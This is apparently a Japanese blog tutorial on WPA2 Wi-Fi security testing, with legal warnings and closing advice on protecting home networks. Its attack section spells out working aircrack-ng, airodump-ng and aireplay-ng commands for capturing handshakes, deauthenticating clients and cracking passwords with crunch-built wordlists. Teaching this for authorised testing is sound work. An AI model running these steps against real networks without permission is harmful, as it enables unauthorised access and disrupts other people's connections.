🐕

倫理的なWi-Fiセキュリティテスト: WPA2の脆弱性を理解する

に公開
Wi-Fi
モニターモードwifiアダプター
tech

倫理的なWi-Fiセキュリティテスト: WPA2の脆弱性を理解する

目的

このガイドは、Wi-Fiセキュリティテストの技術を倫理的かつ合法的に学ぶための教育資料として設計されています。この内容は、WPA2-HOMEネットワークのセキュリティをテストし、脆弱性を理解することを目的としており、学術研究およびセキュリティトレーニングに焦点を当てています。

重要な注意事項: 所有していないネットワークや明確な許可がないネットワークに対してこれらの技術を使用することは違法です。違反した場合、不正アクセス禁止法に基づき、懲役刑や罰金が科される可能性があります。必ず、管理された認可済み環境でこれらのテストを実施してください。

テスト環境

以下の環境でテストを実施しました:

  • オペレーティングシステム: Kali Linux(Windows PCにインストール)
  • ハードウェア: Intel 8260チップセットを搭載し、モニターモードに切り替え可能な古い東芝製ラップトップ

Wi-Fiアダプターをモニターモードに切り替えることは、近隣の無線ネットワークからパケットをキャプチャするために必要です。以下は、Kali Linuxでモニターモードに対応している一般的なチップセットです:

  • Prism
  • Atheros Ath5xxx, AR9271
  • Intel PRO/Wireless 4965ABGN, 3945ABGN
  • Broadcom BCM4306
  • Ralink RTシリーズ(例: RT2860, RT5370N)
  • Realtek RTL8192CU, RTL88xxx, RTL8187L

Kali Linux対応アダプターとチップセットの包括的なリストについては、モニターモード Wi-Fi アダプターを参照してください。

準備

モニターモードへの切り替え

  1. アダプター認識の確認:
    ワイヤレスアダプターが認識されていることを確認するには、以下を実行してください:

    iwconfig

  2. 権限の昇格:
    次のコマンドを使用して、スーパーユーザー権限を取得します:

    sudo su -

  3. モニターモードの有効化:
    アダプターに干渉しているプロセスを停止します:

    airmon-ng check kill

    モニターモードに切り替えます:

    airmon-ng start wlan0

    アダプターがモニターモードになっていることを確認します:

    iwconfig

    出力にMode: Monitorと表示されるはずです。

ネットワークのスキャン

近隣のネットワークとその構成を識別するには、以下を使用します:

iwlist wlan0 scan | grep ESSID

このコマンドは、可視ネットワークとその識別子(ESSID)をリストします。

WPA2セキュリティ分析

WPA2認証の理解

WPA2は接続プロセス中に4ウェイハンドシェイクを使用します。このハンドシェイクには次の手順が含まれます:

  1. アクセスポイント(AP)が疑似乱数(aNonce)をクライアントに送信します。
  2. クライアントが別の疑似乱数(sNonce)を生成し、MIC(メッセージ整合性コード)と共に送信します。
  3. APがノンス値を使用してキーを計算し、MICを検証して追加のキーをクライアントに送信します。
  4. クライアントがMICを確認し、接続が完了します。

4ウェイハンドシェイクのキャプチャ

  1. 対象ネットワークを識別します:

    airodump-ng wlan0mon --essid TARGET_ESSID

  2. ハンドシェイクパケットをキャプチャします:

    airodump-ng --bssid TARGET_BSSID --channel TARGET_CHANNEL --write handshake wlan0mon

  3. クライアントを切断して再接続を強制し、ハンドシェイクをキャプチャします:

    aireplay-ng --deauth 10 -a TARGET_BSSID -c CLIENT_MAC wlan0mon

WPA2のクラック

ワードリストの使用

ハンドシェイクがキャプチャされたら、aircrack-ngを使用してワードリストでパスワードを復元します:

aircrack-ng handshake-01.cap -w wordlist.txt

ワードリストの生成

適切なワードリストが利用できない場合は、crunchを使用して生成します:

crunch MIN_LENGTH MAX_LENGTH CHARACTER_SET -o OUTPUT_FILE

例:

crunch 8 8 abcdef1234 -o wordlist.txt

ブルートフォース技術

辞書攻撃が失敗した場合、ブルートフォース法を使用できます。可能性のある文字セットを分割して小さなターゲットワードリストを生成します。

2つの小さなセットを組み合わせます:

while read -r LEFT; do while read -r RIGHT; do echo "${LEFT}${RIGHT}"; done < right; done < left > bruteForce

ネットワークを保護する方法

このような攻撃からネットワークを保護するには:

  1. 強力なパスワードを使用する:

    • 最低16文字のパスワードを作成する。
    • 大文字、小文字、数字、特殊記号を含める。

  2. 初期設定を変更する:

    • ルーターのデフォルトSSIDおよび管理者資格情報を変更する。

  3. WPSを無効化する:

    • Wi-Fi Protected Setup(WPS)をオフにして、PINベースの攻撃を防ぐ。

  4. ネットワークを監視する:

    • 定期的に接続されているデバイスを確認し、不正アクセスがないか確認する。

  5. WPA3を有効化する:

    • ルーターが対応している場合、WPA3にアップグレードしてセキュリティを強化する。

結論

Wi-Fiセキュリティテストは、脆弱性を理解し、ネットワーク防御を強化するための強力なツールです。このガイドでは、WPA2テストで使用される方法を説明しましたが、常に以下を覚えておいてください:

  • これらの活動は認可されたネットワークでのみ実施してください。
  • 倫理的なハッキングは、脆弱性を特定し修正することを目的としており、悪用するものではありません。

ベストプラクティスに従い、情報を更新することで、ワイヤレスネットワークの安全性と回復力を確保できます。学習を楽しんでください!

Discussion